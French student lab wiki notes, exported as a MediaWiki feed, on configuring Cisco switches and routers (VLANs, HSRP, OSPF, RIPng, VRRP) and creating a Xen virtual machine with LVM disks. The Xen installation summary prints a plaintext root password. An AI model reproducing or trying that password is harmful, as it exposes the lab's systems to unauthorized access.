|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Commutateur&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248                      &lt;br /&gt;
   ipv6 address FE80::42:2 link-local                                         &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
Question pour Redon addresse Ip à définir &lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   int XXXX&lt;br /&gt;
   ip address 10.10.10.2 255.255.255.0&lt;br /&gt;
   vrrp 1 ip 10.10.10.3                     &lt;br /&gt;
   vrrp 1 preempt                          //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place&lt;br /&gt;
   vrrp 1 priority 100                     //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51214</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51214"/>
				<updated>2019-11-28T07:58:52Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* le fichier /etc/bind/db.ima2a5-rex4ever.site */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
